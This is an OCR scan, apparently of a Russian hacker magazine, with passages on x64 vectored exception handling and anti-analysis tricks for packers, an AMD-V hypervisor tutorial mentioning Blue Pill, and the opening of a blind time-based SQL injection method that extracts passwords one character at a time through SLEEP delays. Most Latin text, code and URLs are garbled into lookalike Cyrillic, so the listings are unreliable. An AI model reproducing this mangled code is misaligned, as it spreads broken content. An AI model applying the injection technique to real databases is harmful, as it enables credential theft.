*ЕхсербіопКесогсІ, іпб, іпб, іпб64, іпб64, іпб64) 




ОТЛАЖИВАЕМ НАШ ТЕСТОВЫЙ ПРИМЕР ПОД РйВѲ 



саіі КбІѴігбиаіигшіпсІ 

шоѵ гіі, [гзр+538Ь+СопбехбЕесогб._Еір] 

шоѵ [гЬх+ІОЬ.] , гіі 

шоѵ гах, дз :3 01т 

шоѵ гсх, [гах+бОІт] 

сшр Ьубе рбг [гсх+2], 0 

3 П2 1ос_77Е528СВ 

Іеа гбх, [гзр+53 81т+СопбехбЕесогб] 
шоѵ гсх , гЬх 

саіі КбІБізрабсІтЕхсербіоп 



После того, как нашли РиОізраТсЬЕхсербоп — переходим по первому 
са!1 в ней — это и есть вызов НирСаІІѴесіюгесіНапсІІегз: 



КбІБізрабсІтЕхсербіоп ргос пеаг 

шоѵ [гзр+агд_8] , гбх 

шоѵ гах, гзр 

зиЪ гзр, 6А8І1 

шоѵ [гах+181т] , гЪх 

шоѵ [гах+2 01т] , гЪр 

шоѵ [гах- 8 ] , гзі 

шоѵ [гах- 101т] , гбі 

шоѵ [гах-181т] , г12 

шоѵ [гах-2 01т] , гІЗ 

шоѵ [гах-2 81т] , г14 

Іеа г8, ЕбІрСаІІоибЕпбгуЬізб 

шоѵ гЬх , гбх 

шоѵ [гах-ЗОІт] , г15 

шоѵ гзі, гсх 

шоѵ [гзр+бА81т+ѵаг_бб8 ] , 0 

саіі ЕбІрСаІІѴесбогебНапбІегз 

Дальше — ключевые для постановки бряка фрагменты 
ПИрСа иѴесІіогебНапбІегз. 

ѴѴІпХР: 



1ос_77Е2 51Е5 : ; СОБЕ ХЕЕЕ : 

Еб1рСа1ІѴесбогебНапб1егз+ЗЕ2ВЕ 
шоѵ гЬх, [гзі + 181т] 

шоѵ г9б, 4 

Іеа г8 , [ г зр+ 8 81т+ѵаг_5 8 ] 

Іеа ебх, [г9+201т] 



► 062 
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* * ♦ * ВШ 'Ч* Ъир /Лі^^ ▼ Я Сйо§|е 

— шлдц чик вы с к ЭКШЭ е псгтщзлиготтттео и рви а і а н но і и и и к дю че н пяту 



ВВЕДЕНИИ В ѴЕН, 

& общем, векторная обработка исключений подобна БЕН с тремя ключевыми отличиями: 

* Обработчика не привязаны к определенной функции и стековому фрейму, 

* Компилятор не имеет ключевых слов (типа Сгу/саісй) для добавления новых обработчиков в список 
обработчиков, 

* Обработчики явно добавляются вашим кодом, а не являются плодом конструкции (гу/са^сН, 

новая АРі-функция АббѴесі:огеРЁхсері:ІопНзпсЗіег принимает указатель на функцию как аргумент и добавляет его 
в связанный список обработчиков. Так как система использует связанный список для хранения обработчиков, 
то программа может установить сколько угодно ѴЕН-обработчиков, 

Как ѴЕН сосуществует с ЗЕН? В ѴѴіпХР, список ѴЕН будет обработан перед списком 5ЕН, Это сделано для 
совместимости с уже существующим кодом. Если бы ѴЕН список обрабатывался посла ЗЕН, и ЗЕН-обработчик 
мог обработать исключение, то ѴЁН-обработчики не получили бы шанса заметить произошедшее исключение. 

В отношении отладки, ѴЕН работает подобно ЗЕН, То есть, когда программа отлаживается, отладчик первым 
получает уведомление о произошедшем исключении. Если отладчик решает не обрабатывать исключение и 
передает его отлаживаемому процессу, то вызывается ѴЕН-обработчик, 

Прототип АгібѴесіогебЕхсербопНапсІІег можно найти в ѴѴІМВАЗЕ.Н: 

ИІНВАБЕАРІ РѴОІБ ИІНАРІ АсМѴесЮгебЕхсерЪіопНапсіІег ( 

Р ѴЕСТОЙЕВ_ЕХСЕРТ I ОН_Н АНОІЕН ѴесЮгеёНашііег ); 

Первый параметр сообщает системе, должен ли обработчик помещен в начало связанного списка обработчиков, 
либо в его конец. Список обработчиков не привязан к конкретному потоку и глобален для всего процесса. 
Таким образом, вы можете запросить поместить обработчик в начало списка, но вы не можете гарантировать, 
что ваш обработчик будет вызван первым. Вы не будете первым, если другой участок кода вызовет 
АббѵесХогесІЕхсербопнапсіІег после вас и поместил обработчик в начало списка. Каждый раз, когда вызывается 
АббѴесЬсгесІЕхсербопНапсІІег, новый обработчик помещается либо в начало, либо в конец списка. 

Второй параметр - адрес функции обработчика исключений. Вот его прототип: 

10НС ИТАРІ Ѵе сі: ог абЕ«ссриолНші^1о^РЕХСЕРТ І 0Н РОІНТЕКБ) : 



НА ѴѴА5М.РІ) Л ЕЖИТ ОДНА ИЗ НЕМНОГИХ РУССКОЯЗЫЧНЫХ СТАТЕЙ ПО ѴЕН 



шоѵ гсх, ОРРРРРРРРРРРРРРРРЬ. 

шоѵ [гзр+88Ь+ѵаг_б8] , г12 

саіі ЫбОиегуІпІогшабіопРгосезз 

шоѵ гіісі, [гзр+88Ь+ѵаг_58 ] 

Іеа гсх, [гзр+88к+ѵаг_48 ] 

хог гіі, гЪх ; <- расшифровка адреса обработчика 

саіі гіі | <- вызов очередного обработчика в списке 

Іоск Ъбг сз:бѵ^огб_77РА58С8, О 

Ѵізіа: 



1ос_7 8Е9393Р : ; СОБЕ ХКЕР: КбІрСаІІѴесбогебНапсІІегз-1603 О 

асМ бѵгогсі рбг [г12 + 10Ь] , 1 

Іеа гЬх, [г12 + 10Ь] 

шоѵ гсх, гбі 

шоѵ [гзр+68к+агд_18 ] , г12 

саіі ВбІВеІеазеЗКЖюскЕхсІизіѵе 

шоѵ гсх, [г12+18Ь] 

саіі КбІБесобеРоіпбег 

; <- расшифровка адреса обработчика 
Іеа гсх, [гзр+68Ь+ѵаг_48 ] 

саіі гах ; <- вызов очередного обработчика в списке 

Внимательно посмотрев на листинги, ты, наверняка, понял, что необ- 
ходимо найти цикл вызова обработчиков — и дело в шляпе. Найти его 
труда не составляет — в нем обязательно находится вызов функции 



ЫШиегуІп^огтабопРгосезз/РиОесосІеРоіпІеп После того, как отыскали 
цикл — ставим бряк на инструкцию саІА-регистр. Звучит это пугающе, 
но при наличии Иды все делается за считанные минуты. Очень жела- 
тельны здесь отладочные символы, если же сноровки достаточно, то 
можно и без них обойтись. 

Кстати, на Ѵізіа появилась возможность и вовсе «отключить» 
выполнение ѴЕН-обработчиков через РЕВ. Как? В начале 
РИрСаІІѴесІюгесІНапсІІегз встречается такой код: 

шоѵ гах, дз:3 0Ъ. ; ТЕВ 

шоѵ г15, [гах+бОЬ] ; РЕВ 

шоѵ еах, [г15 + 5 0Ь.] ; РгосеззІІзіпдѴЕН 

Ъб еах, г8б ; проверка второго бита 

ІІЪ са11_ѵесбогеб_1іапб1егз 

То есть можно наставить кучу обработчиков, а потом сбросить флаг в 
РЕВ и ни один из них не будет выполнен! 

СОХРАНИ ПАМЯТКУ 

Вот как на 64-битных версиях ѴѴіпбоѵѵз, в условиях тотального кон- 
троля над 5ЕН, у нас в запасе остался ѴЕН. Пригодиться он может 
много где. Ну, например, в различных пакерах, протекторах или в 
разных интересных программах. Вкупе с обфускацией описанная в 
статье техника может затруднить (пускай и незначительно] анализ 
кода. В последующих статьях я косвенно буду касаться изложен- 
ных здесь приемов, поэтому храни этот материал как своего рода 
памятку, т 
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АППАРАТНАЯ 
ВИРТУАЛИЗАЦИЯ 
НА ПРАКТИКЕ 

НАСТЬ 2. ПЕРЕХОД К ПРАКТИКЕ 
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В ПРОШЛОЙ СТАТЬЕ Я КРАТКО ПОЗНАКОМИЛ ТЕБЯ С АРХИТЕКТУРОЙ АМЦ-Ѵ. 

В ЭТОЙ МЫ ПРОДОЛЖИМ РАЗБИРАТЬСЯ С НЕЛЕГКОЙ ТЕМОЙ. Я НАМЕРЕНО 
УПУСТИЛ МНОЖЕСТВО ВАЖНЫХ ДЕТАЛЕЙ ОТНОСИТЕЛЬНО МЕХАНИЗМА 
РАБОТЫ ГИПЕРВИЗОРА. ДАБЫ С ПЕРВОГО РАЗА НЕ ПЕРЕГРУЖАТЬ ТВОЙ МОЗГ 
БОЛЬШИМИ ОБЪЕМАМИ ИНФОРМАЦИИ. БУДЕМ ЗАПОЛНЯТЬ ЭТОТ ПРОБЕЛ. 



Я буду приводить примеры и форматы 
регистров в і-опд Мосіе по ходу, поэтому 
сразу следует сказать (или напомнить], что 
І_опд Мосіе — это режим работы процес- 
сора, в котором работают все 64-битные 
ОС-и. 

ИНСТРУКЦИЯ ѴМРЦИ 

Как ты помнишь из предыдущей статьи 
(ведь еще помнишь? :]) — инструкция 
ѴМВІЛЧ запускает виртуальную машину. 
Состояние хоста сохраняется в специаль- 
ной области памяти, указатель на которую 
хранится в регистре ѴМ_Н5АѴЕ_РА. А сос- 
тояние запускаемого гостя — загружается 
из ѴМСВ (на которую указывает регистр 
гах]. Сегодня мы будем разбираться с этой 
чрезвычайно важной инструкцией, чтобы 
успешно заполнить управляющий блок 
виртуальной машины и запустить гостевую 
систему... 

А ВЕРНА ЛИ ѴМСВ? 

ѴМРІІІЧ производит кучу проверок правиль- 
ности контрольного блока виртуальной 
машины (а то мало ли что мы ей подсунуть 
хотим]. Если обнаруживается что-то подо- 



зрительное и недопустимое, то нас посылают 
с кодом ѴМЕХІТ_ІЫѴАЕЮ (кстати, некоторые 
коды ѴМЕХІТ я уже упоминал в предыдущей 
статье]. 

Итак, в каких же случаях ѴМРІІІЧ откажет- 
ся запускать гостя? Буду перечислять эти 
ситуации по пунктам, а тебе при прочтении 
рекомендую иметь перед глазами структуру 
ѴМСВ. 

Заголовочный файл, содержащий ѴМСВ: 

ЬЩДр : //орепзоіагіз . огд/зс/згс/хеп- 
дабе/хѵт-З . 4+хеп . Ьд/хеп/ іпсіисіе/ 
азш-х8 б /Ь.ѵш/ зѵт/ ѵтпсЬ . Ъ. 

1. Флаг в 5ѴМЕ в регистре ЕЕЕР равен 0. 
Аппаратная виртуализация в госте должна 
быть включена. 

2 . Сброшен бит СРО.СО и одновременно уста- 
новлен СРО.ІХѴѴ. Первый бит расшифровыва- 
ется как Сасбе ОізаЫе — когда он установ- 
лен, инструкции и данные не помещаются во 
внутренние кэши. А вот второй бит (по край- 
ней мере, так написано в Мануэле АМИ] — 
вообще игнорируется. Странно, что ѴМПІЛМ 
его проверяет при сброшенном бите СО. 

3. Старшие 32 бита СПО не равны 0. Если ты 



посмотришь на формат регистра СПО (в Іопд 
тобе], то увидишь, что эти биты должны 
быть равны 0 (смотри иллюстрацию]. 

4 . В регистрах С РЗ, СП4, О Р6, ОН7, ЕЕЕП не 
равны нулю биты, отмеченные как МВ2 (Мизі; 
Ве 2его]. 

5 . А5Ю равен 0. АЗЮ — это идентификатор 
адресного пространства, позволяющий 
отличать элементы хоста от гостевых в 
ассоциативном буфере трансляции (ИВ). 

То есть поле А5Ю должно быть обязательно 
проинициализировано. На всякий случай 
напомню, что ИВ используется для ускоре- 
ния преобразования виртуальных адресов в 
физические. Наличие АЗЮ-идентификатора 
позволяет избежать сброса ИВ при каждом 
входе и выходе из гостя. Что, конечно, поло- 
жительно сказывается на производитель- 
ности. 

6. Ошибочная инъекция события. 
Инжектированное событие — это прерыва- 
ние или исключение, выполняемое перед 
первой инструкцией гостя. 

// Структура еѵепСіпПі: в ѴМСВ 
описывает параметры инжектирован- 
ного события 



► 064 
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ЦуресІеТ ипіоп 

{ 

иб4 Ъукез; 
зСгиск 
{ 

иб4 ѵеског: 8; // номер 

прерывания или исключения 

и64 Руре: 3; // тип 

события 

и64 еѵ: 1; // бит, ука- 

зывающий на правильность кода 
ошибки (поле еггогсобе) . 

и64 гезѵбі : 19; // заре- 
зервированные биты 

и64 ѵ: І| // Ѵаііб. Если 
этот бит установлен, событие 
инжектировано, если сброшен — не 
инжектировано 

и64 еггогсобе : 32 ; // код 

ошибки 

} Ріеібз; 

} аРРгіЬибе ( (раскеб) ) 

еѵепбіп:і_Р | 

Вообще, возможных типов инжектирован- 
ных событий (поле Іуре] всего 4: 

О — ІІЧТП (внешнее прерывание); 

2 — N М I (немаскируемое прерывание). Если 
мы укажем тип N М I , то поле номера преры- 
вания (ѵесіог) будет игнорироваться; 

3 — исключение; 

4 — программное прерывание. 

Если бит еѵ (Еггог собе ѵаіісі) установлен, 
то код ошибки еггогсобе будет «затолкнут» 
в стек. В каких случаях инъекция события 
неверна? Например, если гость в 64-бит- 
ном режиме, а мы пытаемся инжектировать 
исключение #ВВ (вызывается командой 
Ьоипб], невозможное в этом режиме. Мы 
также получим ѴМЕХІТДІМѴАЕІО, если будем 
использовать зарезервированные значения 



поля Іуре (1,5,6 или 7). Или если мы укажем 
тип исключения, а номер вектора — 2, что 
соответствует N М I (это немаскируемое пре- 
рывание, а не исключение!). 

7 . Биты ЕЕЕП.ЕМА (Еопд Мобе АсБѵе) или 
ЕМЕ (Бопд Мобе ЕпаЫе), отвечающие за 
активацию Бопд Мобе, установлены, а 
процессор не поддерживает Бопд Мобе. 
Вполне логично, что такое сочетание будет 
признано невалидным. 

8 . Одновременная установка битов ЕБЕВ. 
БМЕ и СВО.РО (флаг включения странично- 
го преобразования адресов) при сброшен- 
ном бите СР4.РАЕ (или СРО.РЕ) — недопу- 
стимая комбинация. 

9 . Флаги ЕЕЕР.БМЕ, СР0.Р6, СР4.РАЕ (бит 
расширения физического адреса), 05.6 

и СБ.Б одновременно установлены. С5 — 
сегмент кода. Биты Б и Б содержатся в 
дескрипторе сегмента. В 32-битном защи- 
щенном режиме бит 0 использовался для 
указания размера операнда и адреса (32 
или 16 бит), а бит Б — это бит, указываю- 
щий, что размер адреса и операнда у нас 
64 бита. Теперь, я думаю, тебе понятно, 
почему одновременная установка этих 
двух битов является ошибкой (то есть мы 
указываем, что у нас одновременно по 
умолчанию установлен размер операнда 64 
и 32 бита). 

10 . Б ит перехвата инструкции ѴМПБІІЧ (в 
области управления ѴМСВ) сброшен — эта 
инструкция должна перехватываться в 
обязательном порядке. Да, ты все верно 
подумал. Действительно, можно вызывать 
ѴМПБІІЧ, уже находясь в режиме гостя. Вот 
пример, связанный с Голубой пилюлей. 
Некоторым людям удавалось запускать 
более 20 (!) вложенных пилюль. Главное — 
правильно сделать перехват этой инструк- 
ции. 



В ѴМСВ бит перехвата ѴМРБІІЧ располага- 
ется в двойном слове по смещению 1 0 Ь от 
начала управляющего блока виртуальной 
машины и перехватить ѴМПБІІЧ можно так: 



// Бит ѴМКШ_ШТЕКСЕРТ имеет 
номер О 



рѴтсЬ->депега12_іпЦегсерЦз I =1; 



Вообще, поле депега 12_і піегсерБз 
помимо бита перехвата ѴМПБІІМ 
содержит флаги перехвата дру- 
гих инструкций из зѵт-расширения: 
ѴММСАББ,ѴМБ0АБ,ѴМ5АѴЕ,5Т6І,СБ6І и 
5 КІ N ІТ, но перехватывать эти инструкции 
уже необязательно. 

11 . Физические адреса карты разрешения 
МБР (М5РРМ) или ввода-вывода (ІОРМ) 
равны или больше максимального поддер- 
живаемого физического адреса. А иначе им 
(картам) просто не хватит места! Карта раз- 
решения МБР (как и ввода-вывода) должна 
быть выровнена по границе 4 килобайта. 

И ѴМРБІЫ игнорируются младшие 12 бит 
адреса М5РРМ и ІОРМ. О картах, кстати, я 
упоминал в предыдущей статье. 

Если ѴМСВ верная, то можно продолжать. 
Теперь ты знаешь, чего делать нельзя. 
Дальше поговорим о том, что можно и 
нужно :). 

ѴМРЕЛЧ после проверок и сохранения 
состояния хоста загружает следующую 
информацию из контрольного блока вирту- 
альной машины. 

Первое, что обрабатывается ѴМРБІІЧ — это 
область состояния гостя (она же Біаіе Баѵе 
Агеа): 

1. С5 и гір — определяют, откуда начнет 
выполняться гость. С5 — сегмент кода, а гір — 
указатель инструкции в Іопд тобе (когда 
мы имели дело с 32-битами, у нас был 
регистр еір). 

2 . Регистры гНадз.гах... 

3. 55 (сегмент стека) и гзр — стек гостя. В 
32-битном режиме был не гзр, а езр :). 

4 . СРО, СР2 (в этом регистре содержится 
виртуальный адрес ошибки страницы — 
раде ІаиБ), СРЗ, СР4 и ЕГЕР — эти реги- 
стры отвечают за страничное преобразова- 
ние адресов в гостевой системе. 

5 . ЮТР, 6БТР(база и размер таблиц дескрип- 
торов 0БТ и I ОТ) , Е5 и Б5, БР7 и БР6. 

6. Ѵ_ТРР — виртуальный регистр приори- 
тета задачи (ТРР). Значение поля ѵ_1;р г 
записывается в регистр СР8 гостя. Регистр 
приоритета задачи используется в случаях, 
если, у нас, например, пришло какое-то «не 
очень важное» прерывание, а выполняется 
какая-то задача, которую ну никак нельзя 
прервать. Тогда мы записываем приоритет 
прерывания (например, 7) в регистр СР8 

и все прерывания с приоритетом меньше 
7(включительно) будут игнорироваться. 
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Пезегѵегі 



ФОРМАТ РЕГИСТРАСКо 



1НТТР://УУУШ 



63 



за 51 



за 



РезегѵесІ, МВ2 



Раде-Мар І_еѵеІ-4 ТаЫе Вазе Агігігезз 
(ТЬІз із ап агсЫіесІига! ІітіІ, А діѵеп ітрІетепМіоп тау зирроП іеѵѵег Ьііз.) 



Т 

> Ііпкз 

• Цикл статей 
Вгокеп ЭѵѵогсІ на 
ѵѵазт.ги, посвя- 
щенный защищен- 
ному режиму: Ыір:// 
уѵазт.ги/риЫ-ізІ:. 
рЬр?Іізі=24 . 

Систематизировать 
знания (или про- 
белы заполнить] 
по І_опд Мобетебе 
помогут следующие 
статьи. 

• Архитектура 
АМЭ64 (ЕМ64Т) — 
ѵіѵа64.сот/соп1:еп1:/ 
агіісІез/64- 
Ьіі-сіеѵеіортепі/ 
?1=атсІ64 ет64і гиз. 
ЬітІ.&І.апд=ги& 
соп1:епЩб4-Ы1:- 
беѵеіортепі: . 

• Статья Криса 
Касперски 
«Архитектура х86- 
64 под скальпелем 
ассемблерщика» — 
іпзісіерго.сопп/кк/ 
072/072г.зНітІ . 

• Статья «Ап 
Іпігосіисііоп 
Іо Нагбѵѵаге- 
Аззізіесі Ѵігіиаі 
МасЫпе (НѴМ) 
Вооікііз» (в том 
числе, упоминается 
баге Т5С_0ЕЕ5ЕТ] 

— іедазесигііу.огд/ 
рарегз/ЬѵтгооІкіІз.рсК 

• «Реѵізіоп Оиібе 
ІогАМО ЫРТ Еатііу 
ОРИ Ргосеззогз» 
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} Ііеібз; 

} 

аССгіЬиСе ( (раскеб) ) 

аЦЦгіЪикез_Ь ; 



Рідиге 3-6. Сопігоі Педізіег 3 (СИЗ)— Ьопд Мойе 
РЕГИСТР СРЗ В І_0Ы6 МОРЕ (МЫ ЖЕ ПИШЕМ ПОД 64 БИТА!) 



7 . Ѵ_ІР0. Этот флаг определяет, будет ли виртуальное 
прерывание отложено. 

8 . СРІ_ или текущий уровень привилегий. Если гостевая 
система загружается в реальный режим — СРІ_ = 0, если 
в режим виртуального 8086, то 3. 

СРІ_ определяет кольцо защиты: 0 — нулевое, 3, соот- 
ветственно, третье. 

После этого ѴМРІЭЫ переходит к обработке области фла- 
гов (Сопігоі Агеа]. 

Здесь можно отметить так называемый Т5С_0РР5ЕТ. 
Значение Т5С_0ЕЕ5ЕТ добавляется к счетчику меток 
реального времени (в мануалах — Т5С] в госте, когда 
тот решит получить его значение. 

То есть, когда мы выполним в госте команду гбізс, то к 
значению счетчика будет автоматически прибавлено 
значение Т5С_0ЕЕ5ЕТ. С этим полем связан известный 
баг (Еггаіит 140], когда при чтении ТЗС М5Р через 
гсітзг, а не гбізс значение Т5С_0ЕЕ5ЕТ не прибавля- 
лось к счетчику. 

Конечно, в Сопігоі Агеа мы можем указать множество 
различных событий или инструкций, которые хотим 
перехватывать. Также считывается уже упоминавшийся 
идентификатор А5Ю и т.д. 

В нашей структуре ѴМСВ каждый сегмент описывается 
структурой 5едтеп1_гедІ5І;ег (код взят из Хеп), содер- 
жащей части дескриптора сегмента и селектор на этот 
дескриптор: 

// структура, описывающая атрибуты сегмента 

Руребеб ипіоп зедтепб_аЦЦгіЪиРез 
{ 

иіпб16_Ь Ьубез; 

зкгиск 

{ 



иіпб1б_ 




1: 


1; 


/* 


9; 


Віб 


53 


*/ 


иіпб1б_ 




6Ь: 


1; 


/* 


10; 


Віб 


54 


*/ 


иіпбіб. 




д: 


1; 


/* 


11; 


Віб 


55 


*/ 


иіпбіб. 




раб: 


4; 













зедтепб_ 



// Структура, описывающая сегмент в ѴМСВ 
збгисб зедтепЦ_гедізбег 
{ 

/ / селектор на дескриптор сегмента 
иіпб16_Ь зеі; 

/ / атрибуты сегмента 
зедтепб_аб1ігіЪиЦез_Ь аббг; 

// размер 
иіпб32_Ь ІітіР; 

// адрес начала сегмента 
иіпб64_Ь базе; 

} абЦгіЬибе ( (раскеб) ) ; 

К атрибутам сегментов в ѴМСВ предъявляются опреде- 
ленные требования. Подробнее: 

1. Не разрешен нулевой сегмент кода, поэтому восприни- 
маются аппаратурой только некоторые биты в дескрипто- 
ре Ю, I, В]. 

2 . Регистр ТР может иметь только тип Т35 (напоминаю, 
что тип сегмента определяется в дескрипторе сегмента]. 

3. У ЮТР из атрибутов не игнорируется только бит при- 
сутствия сегмента (Р]. 

Когда сработает какое-либо перехватываемое событие, 
управление получит инструкция после ѴМПІІЫ (впрочем, 



(перечисляют- 


иіпРІ6_ 




куре : 


: 4 ; 


/* 


0; 


Вік 


40-43 */ 


я об этом уже говорил]. После УМРИИ необходимо раз- 


ся еггаіит-ы] 


иіпбіб. 




з : 


1; 


/* 


4; 


Віб 


44 */ 


местить код проверки и обработки различных условий 


— зиррогВатб. 


иіпРІ6_ 




і — 1 

б 


2; 


/* 


5; 


віе 


45-46 */ 


#ѴМЕХІТ. 


сот/из/Ргосеззог 


иіпбіб. 




р: 


1; 


/* 


7; 


ВІб 


47 */ 


Ядро гипервизора составляет цикл из ѴМРІЭЫ и обра- 


ТесЬОосз/3361 0.рсІЕ 


иіпРІ6_ 




аѵі : 


1; 


/* 


8; 


ВІР 


52 */ 


ботки ѴМЕХІТ: 



► 066 
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КОНТРОЛЬНЫЙ РЕГИСТР СР4 

31 24 23 22 21 20 19 16 15 14 13 12 1 1 10 9 8 7 О 



Вазе АаісІгезБ 31—24 


6 


□ 


1- 


А 

V 

Ь 


Зедтѳпі 
Ытіі 19-1 6 


Р 


ОРІ. 


1 


1 


С 


в 


А 


Вазе Агійгезз 23-16 


Вазе Айсігевз 15-0 


Зедтепі Ьітіі 1 5-0 



ДЕСКРИПТОР СЕГМЕНТА КОДА В ЮИО МООЕ 



// основной цикл гипервизора 
(в общем виде) 

// раѴшсЬ — рЬузісаІ аббгезз ѵтпсЬ 
// ѵаѴшсЬ — ѵігіиаі асЫгезз ѵшсЬ 

бо 

{ 

// после каждого ѴМЕХІТ нужно 
устанавливать все перехваты зано- 
во, т . к . они очищаются 

ІпзбаІІІпбегсерРз (ѵаѴшсЬ) ; 

// передаем ѴМКІШ физический 
адрес ѴМСВ 

_ѴМКШ( раѴшсЬ) ; 

// обработка кодов выхода из 
гостя 

зчбІсЬ ( ѵаѴтсЪ->ехі1собе) 

{ 

сазе ѴМЕХІТ_КБТЗС : 



Ьгеак; 

сазе ѴМЕХІТ_ѴМКШ: 



Ьгеак; 

// другие обрабатываемые 

события 

} 

}™М1еИ) ; 

Для полного понимания сказанного тебе 
придется подтянуть знания защищенного 
режима работы процессора (если ты не зна- 



ком с этой темой). Ссылки на дополнитель- 
ную литературу я привожу на полях статьи. 

СОЗДАЕМ ѴМСВ 

Ну что, твоих знаний еще недостаточно 
для создания полноценного гипервизора? 
Однако продолжаю потихоньку вводить тебя 
в курс дела :]. 

Что касается выделения блока памяти под 
ѴМСВ и Нозі: 5аѵе Агеа — это можно сделать 
ядерной функцией МтАНосаіеСопбдиоизМе 
тогуЗресііуСасЬе. Ее прототип: 

ЫТКЕЕЫЕЬАРІ 

РѴОІБ 

МшАІІосабеСопРідиоизМешогуЗресі 
ІуСасЬе ( 

Ш ЗІ2Е_Т ЬитЬегОбВубез , // 

количество выделяемых байт 
Ш РНУ 8 1 С АЬ-АББЫЕ 8 8 
ЬсжезІАссерІаЫеАббгезз , // ниж- 
няя граница при выделении памяти 
Ш РНУ 8 1 С АЬ_АВБКЕ 8 8 
НідЬезІАссерІаЫеАббгезз , // верх- 

няя граница при выделении памяти 
Ш РНУ 8 1 С АЬ_АВВВЕ 8 8 
ВоипбагуАббгеззМиІІірІе ОРТКЖАЬ , 
// выравнивание региона 

Ш МЕМОКУ_САСНШС_ТУРЕ 
СасЬеТуре 
) ; 

В прошлой статье я упоминал, что для пони- 
мания кода понадобится опыт разработки 
дров под Винду (ну или хотя бы минималь- 
ные знания, чтобы понимать соре). 
Примерный код для выделения памяти под 
ѴМСВ: 

11.<2иабРаг1 = 0; // минимальный 

адрес для выделения 



12 . ОиабРагР = -1 ; 

/ / максимальный адрес 

13 . ОиабРагІ = 0x10000; 

// выравнивание 

// ѴМСВ занимает 1 страницу, => 
иИишЬегОбРадез = 1 

// СасЬеТуре = МтСасЬеб 
РадеѴА = МшАІІосаРеСопбідиоизМе 
тогуЗресіІуСасЬе (иМишЬегОІРадез * 
РАСЕ_ЗІ2Е, 11 , 12, 13, СасЬеТуре); 

11 (! РадеѴА) 

геіигп ЩЗЬЬ ; 

/ / обнуляем выделенный регион 
К1І2егоМетогу (РадеѴА, 

иМитЬегОІРадез * РАСЕ_ЗІ2Е) ; 

/ / получаем физический адрес 
выделенного региона 

РадеРА = МтСеІРЬузісаІАббгезз 
(РадеѴА) ; 

Аналогичным образом память выделяется и 
для Н5А, и для карт разрешения М5П и 1010. 

ЗАКЛЮЧЕНИЕ 

Вот и все на сегодня. Информации много, и, 
чтобы ее полностью переварить (если тема 
для тебя новая), потребуется время. Помни, 
дорогу осилит идущий. 

А со мной по-прежнему можно связаться по 
е-таіі и написать свои предложения или 
вопросы по содержанию статей (или просто 
пообщаться на тему аппаратной виртуализа- 
ции). ~тг 
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ДИАЛОГ С НЕМЫМ ' 

$(И ИСПОЛЬЗУЕМ ПРОДВИНУТЫЙ МЕТОД 
СЛЕПЫХ 501. 



ИНЪЕКЦИИ ОЧЕНЬ РАЗНООБРАЗНЫ ПО СВОЕЙ СУТИ. В СТАТЬЕ Я НЕ БУДУ 
РАССКАЗЫВАТЬ ИХ КЛАССИФИКАЦИЮ. ОТМЕЧУЛИШЬ, ЧТО СЕЙЧАС НАС 
БУДЕТ ИНТЕРЕСОВАТЬ СЛЕПАЯ ЗОЬ-ИНЪЕКЦИЯ - ТОТ СЛУЧАЙ. КОГДА 
СЕРВЕР С НЕОХОТОЙ ДЕЛИТСЯ С НАМИ КАКОЙ-ЛИБО ИНТЕРЕСНОЙ 
ИНФОРМАЦИЕЙ. НО ВСЕ ЖЕ ПО КОСВЕННЫМ ПРИЗНАКАМ ХАКЕР МОЖЕТ 
ОПРЕДЕЛИТЬ КОНТЕНТ БД. Я ПРЕДЛОЖУ ТЕБЕ ЕЩЕ ОДИН ПРИЕМ СЛЕПОЙ 
301, КОТОРЫЙ РАНЕЕ НИГДЕ НЕ ОПИСЫВАЛСЯ. 



Ч ем же так примечательны эти слепые 
инъекции? Атем, что они вовсе и не 
примечательны, а противны и безоб- 
разны. Как для меня стобой.таки для 
сервера. Если мы говорим о критиче- 
ских случаях, когда сервер не показывает ни- 
ка кихошибок, то для получения информации 
из базы данных обычно приходится выбирать 
данные на условиях ложь/правда. Это за ни ма- 
ет очень много времени, сильно пачкает логи, 
а иногда нагружает5СИ-сервер. Все-таки, на 
один символ — несколько запросов. 

Но сейчас мы изменим ситуацию к лучшему. 
Как тебе один символ на один запрос при 
слепой, совсем-совсем слепой, инъекции? 
Наверняка тебя интересует, как же можно 
такого добиться, когда недоступны никакие 
источники информации, кроме как ответ сер- 
вера — ІхиеЛаІзе. Однако, можно. Мы задей- 
ствуем еще один параметр — время. 
Вероятно, ты подумал: «автор статьи дви- 
гает в массы старье, про Еіте-ЬазесІ 501- 
инъекции все уже знают». А вот и нет! Это 



будет продвинутая, или «абѵапсесі» бте- 
ЬазесІ 50Е-инъекция. Мы не будем ничего 
сравнивать, как это обычно происходит, и 
суть новинки заключается в определении 
уникальных временных задержек сервера — 
по задержке на символ. 

То есть, мы говорим серверу ничего нам не 
сообщать в течение определенного време- 
ни для какого-то определенного символа. 
Фактически, получается таблица соотноше- 
ний временных задержек и символов. 

БЕРЕМ СЕРВЕР ЗА РОГА 

Попробуем реализовать мой метод на прак- 
тике. Для примера возьмем популярный и 
многострадальный Му5СИ 5. Пятая, а точнее 
5.0.12 версия, предлагает нам новую (относи- 
тельно новую] функцию 5БЕЕР0. 

туз^1> ЗЕЬЕСТ ЗЬЕЕР(2); 



I ЗЬЕЕР ( 2 ) | 



О I 



1 гсж іп зеС (2.00 зес) 

Она приказывает серверу уснуть на какое-то 
количество секунд. Я решил воспользоваться 
этой функцией вместо старой и совсем не 
доброй ВЕІЧСНМАПКО по следующим при- 
чинам: 

1. ВЕЫСНМАРКО не дает такой точности, как 
новая функция; 

2. ВЕЮМАККО нагружает сервер, незачем 
его мучить; 

3. ЗЬЕЕРО немного короче; 

4. ВЕМСНМАРКО уже успела наследить в раз- 
ных ѴѴАБ. 

Вопрос такой — на сколько секунд при каком 
символе ЗОБ-серверу стоит засыпать? 
Можно, конечно, в каждом запросе посылать 
нечто вроде массива отношений время/сим- 
вол, но это неэлегантно. Решить проблему 
можно следующим образом. Допустим, мы 
посимвольно извлекаем пароль при помощи 



► 068 
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СООТНОШЕНИЕ ВРЕМЕНИ ОЖИДАНИЯ И СИМВОЛА ПРИ КОЭФФИЦИЕНТЕ ТОЧНОСТИ 2 




51ІВ5ТР0 или его более короткого аналога 
— МЮ(), тогда каждый полученный символ 
преобразуем в АЭСІІ-значение. И то, что мы 
получили, передаем функции 5І_ЕЕР(). 

тузд1> ЗЕБЕСТ ОКБ ('*'); 



I ОКБ ( 1 * 1 ) I 



42 I 



1 гом іп зеЕ (0.00 зес) 

Но значение слишком велико, чтобы так 
долго ждать. Ведь уже для символа * это 
целых 42 секунды, а что будет для і? Поэтому 
немного слукавим и от полученного значения 
отнимем 40. Все 42 секунды не стоит брать, 
так как не будет понятно, получилась ли теку- 
